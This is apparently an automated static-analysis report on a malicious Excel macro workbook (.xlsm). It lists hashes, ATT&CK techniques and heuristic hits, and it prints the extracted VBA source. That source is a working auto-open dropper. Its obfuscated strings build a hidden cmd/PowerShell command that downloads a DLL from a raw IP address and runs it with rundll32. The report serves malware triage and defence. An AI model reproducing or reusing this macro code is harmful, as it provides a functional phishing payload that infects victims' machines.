Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 0b149fc1f48da1d2…

MALICIOUS

Office (OOXML) / .XLSM

87.2 KB Created: 2006-09-28 05:33:49 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-26
MD5: 7ac2366ab4515b9f37be3187deea9bc0 SHA-1: c4cee812f0fb97c510e149a28c1a55b6c5da2c9e SHA-256: 0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d
130 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The file is an XLSM document containing VBA macros, with a critical heuristic firing for potential Shell execution. The Workbook_Open macro is present, indicating automatic execution upon opening. While the VBA code is truncated, it appears to be designed to execute arbitrary commands, likely for downloading and running a secondary payload. No specific family could be identified.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                wer = te + Shell(hkiwe + " " + wkjh, 0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6227 bytes
SHA-256: 8a7e7819df6b91f47eafc2ab79d0af373d8adb5e25bdbaf0c3846296f5a42d91
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Sub df4yw35yhdf()
Dim iCount As Long, i As Long, j As Long, k As Long
Dim Str1 As String, Str2 As String
k = 1
iCount = Selection.Cells.Count
    For i = k To iCount
        Str1 = CStr(Selection.Cells(i).Value)
            If Str1 <> "" Then
                For j = i To iCount
                    Str2 = CStr(Selection.Cells(j).Value)
                        If i <> j And Str1 = Str2 Then Selection.Cells(j).ClearContents
                Next j
            End If
    Next i
End Sub



Sub erfllj()
    Dim lr As Long
    Dim lAllCnt As Long
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        If bShowBar Then Call MyProgresBar
    Next
    If bShowBar Then Unload frmStatusBar
End Sub

Sub bwla4kl()
    Dim lr As Long, lp As Double
    Dim lAllCnt As Long
    Dim s As String
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        lp = lr \ 100
        s = String(lp \ 10, ChrW(10152)) & String(11 - lp \ 10, ChrW(8700))
        Application.StatusBar = "????: " & lp & "% " & s: DoEvents
        DoEvents
    Next
    Application.StatusBar = False
End Sub

Function ertjwlkfj(flkas As Long, fewo4ih As String, hnfkl34 As String, ndr54 As Long, bvret As Long) As Integer
    
   Dim fhks, hkj23, hkiwe, wkjh As String
   Dim wer As Double
    fhks = "pcw"
    hkj23 = fhks & "w"
    
    fhks = "jLwCjLw:jLw\jLwWjLwijLwndjLwowjLws\SjLwysjLwtejLwm3jLw2\cjLwmjLwd.jLwejLwxjLwe"
    
    For i = 1 To 20
        Dim uow As Double
        If i = 998 Then
            MsgBox "q34"
        End If
    Next
    
    hkiwe = rhqwoelhsld(fhks, "jLw")
    
    wer = wer + 1
    
    hkj23 = "aYk/aYkc saYktaaYkraYkt /aYkB /WaYkAIaYkT paYkoaYkweaYkrsaYkheaYklaYkl aYk-aYkenaYkc SQaYkBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwaYkA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzaYkAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdaYkQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABaYkhAHQAYQBcAGMAbABiAC4AZABsAGwAIgaYkA" & "aYk=" + " aYk& saYktaYkaraYkt aYkCaYk:aYk\aYkWaYkinaYkdoaYkws\SaYkysaYkteaYkmaYk3aYk2\raYkunaYkdlaYkl3aYk2.aYkeaYkxaYke aYkCaYk:aYk\aYkPraYkoaYkgraYkamaYkDaaYktaYka\caYklb.daYklaYkl,AlaYkoperNotaYkeaYkW"
    
    For i = 5 To 30
        Dim e As Integer
        If i = 998 Then
            e = e + i
        End If
    Next
    
    wkjh = rhqwoelhsld(hkj23, "aYk")
    
    For i = 1 To 20000000
        Dim te As Double
        te = Sin(i)
        If i = 19999998 Then
            wer = te + Shell(hkiwe + " " + wkjh, 0)
        End If
    Next
    
    ertjwlkfj = 0
End Function

Sub gwolkel()
    Dim lr As Long
    Dim lAllCnt As Long
    Const lMaxQuad As Long = 20
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        Application.StatusBar = "???: " & Int(100 * lr / lAllCnt) & "%" & String(CLng(lMaxQuad * lr / lAllCnt), ChrW(9632)) & String(lMaxQuad - CLng(lMaxQuad * lr / lAllCnt), ChrW(9633))
        DoEvents
    Next
    Application.StatusBar = False
End Sub


Function rhqwoelhsld(ByVal jlvfd As String, bxcj As String) As String
    If jlvfd = "2" And bxcj = "2" Then
        Dim d As Byte
        d = CByte(jlvfd)
    Else
        rhqwoelhsld = Replace(jlvfd, bxcj, "")
    End If
End Function






Sub dgfjsldk()
    Dim Workbooks As Object
    NbCol = Workbooks(Fname1).Sheets(LName).Rows(1).Find(What:="Дата", LookIn:=xlValues, SearchDirection:=xlPrevious, SearchOrder:=xlByColumns).Column
    Dim a(), i As Long
    i = Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, 1).End(xlUp).Row
    a = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(i, NbCol)).Value
    ReDim B(1 To i, 1 To 1)
    Do While i > 1
        If dMain.exists(a(i, 1)) Then B(i, 1) = 1
        i = i - 1
    Loop
    Dim x As Range
    NbCol = Workbooks(Fname1).Sheets(LName).Cells(1, Columns.Count).End(xlToLeft).Column + 2
    Erase B
    Set x = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).Find(1, , , xlWhole)
    If Not x Is Nothing Then
        Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).ColumnDifferences(x).EntireRow.Hidden = True
    End If
End Sub

Private Sub Workbook_Open()
    Dim fojn As Long
    Dim x, y, z As Double
    Dim hnfkj As String
    
    wejlfkdjf
    
    hnfkj = "a"
End Sub


Public Sub wejlfkdjf()
    Dim fojn As Long
    Dim fjl As String
    
    fjl = "w"
        
    fojn = ertjwlkfj(0, "", "", 0, 0)
    If fojn = 123 Then
        fjl = "r" & fjl
    End If
End Sub

Sub ghayh45aghf()
    Dim lAllCnt As Long, lr As Long
    Dim rc As Range
    lAllCnt = Selection.Count
    For Each rc In Selection
        lr = lr + 1
        Application.StatusBar = "??: " & Int(100 * lr / lAllCnt) & "%"
        DoEvents
    Next
    Application.StatusBar = False
End Sub



Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 27648 bytes
SHA-256: 5362a865257aaafdd7503136b910382ca531abb77dbd01c8752c8a55e02b821b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).